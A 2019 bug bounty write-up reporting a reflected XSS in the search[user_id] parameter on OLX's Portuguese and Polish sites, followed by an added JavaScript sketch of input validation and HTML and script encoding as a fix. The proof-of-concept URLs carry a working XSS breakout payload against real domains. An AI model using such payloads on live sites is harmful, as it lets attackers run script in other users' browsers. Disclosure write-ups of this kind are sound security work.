A real XSS in OLX Bug Bounty

Paulo Choupina
Mar 21, 2019

I saw a couple of other write-ups and blog posts about “XSS in OLX” but when I got to read them, they ended up being either stored XSS or on some other website that falls within the scope of OLX…

SO!!

I figured, “hey, if they are good enough for a write-up, so is my bug.” xD

Original report: https://hackerone.com/reports/477771

I was looking for bugs on another website when I came across this.
It is a reflected Cross-Site Scripting (XSS) vulnerability in the parameter search[user_id], located on the main page of Olx.pt.

If you navigate to Olx.pt, choose a random item, open that item page and click “outros anúncios” (“other ads”), you will get redirected to:

https://www.olx.pt/ads/?search%5Buser_id%5D=xxx&view=galleryWide

Within that page, the parameter search[user_id] was vulnerable to XSS.

POC:

https://www.olx.pt/braga/?search%5Buser_id%5D=1zqjeu'%22()%7B%7D<x>:/1zqjeu;9</SCript><svG/onLoad=prompt(9)>, ;prompt(9);&view=galleryWide

It was across all the domains; here is an example of it in Poland’s domain:

https://www.olx.pl/lubelskie/?search%5Buser_id%5D=1zqjeu'%22()%7B%7D<x>:/1zqjeu;9</SCript><svG/onLoad=prompt(9)>, ;prompt(9);&view=galleryWide

I reported it and got added to OLX’s Hall of Fame:
https://security.olx.com/security-hall-of-fame.html

Kudos to me!! xD
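
An added example, not part of the original write-up and not OLX's code: one way a server could handle search[user_id] so that a value like the PoC above is rejected and never reflected as markup. It assumes a legitimate user id is a short alphanumeric token; the function names and the rendered HTML are hypothetical.

```javascript
// Assumption: a legitimate user id is a short alphanumeric token.
const USER_ID_RE = /^[A-Za-z0-9]{1,32}$/;

// Encode for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Encode for an inline <script> block: emit a JSON string literal and escape
// the characters that could close the script element or open a comment.
function escapeForScript(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/&/g, "\\u0026")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Allowlist validation: return the id only if it matches the expected shape.
function readUserId(queryString) {
  const raw = new URLSearchParams(queryString).get("search[user_id]");
  return raw !== null && USER_ID_RE.test(raw) ? raw : null;
}

// Hypothetical page fragment: validate first, then encode per output context.
function renderAdsHeader(queryString) {
  const id = readUserId(queryString);
  if (id === null) return { status: 400, body: "<p>Invalid user id</p>" };
  return {
    status: 200,
    body: `<h1 data-user="${escapeHtml(id)}">Ads</h1>` +
          `<script>var userId = ${escapeForScript(id)};</script>`,
  };
}
```

Validation and encoding are both kept on purpose: the allowlist rejects the PoC outright, and the per-context encoders still protect any value that reaches the template by another path.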
